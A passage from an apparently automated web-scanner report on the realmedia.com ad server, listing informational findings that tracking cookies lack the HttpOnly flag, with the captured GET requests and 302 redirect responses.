Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:39:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 217
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 22:40:47 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/L34/230410894/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?23041089
...[SNIP]...

11.472. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O1012Mr|O2016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:57 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.473. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:53:25 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.474. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:10:03 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.475. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:18 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.476. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O1012Mr|O1016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:43 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.477. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:01:49 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.478. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O6016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:05:56 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1020254070/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:43 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1020254070/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:03:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:43 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1141449012/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:03 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1141449012/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:03:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:03 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1183243859/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:03:37 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1183243859/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:02:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:03:37 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1310742069/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:05:15 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1310742069/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:04:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:05:15 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/141555552/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:05:21 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/141555552/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:04:21 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:05:21 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1616156922/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:25 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1616156922/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:03:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:25 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1911154246/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:03:46 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1911154246/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:02:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:03:46 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/2083207614/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:22 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/2083207614/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:03:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:22 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:05:26 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
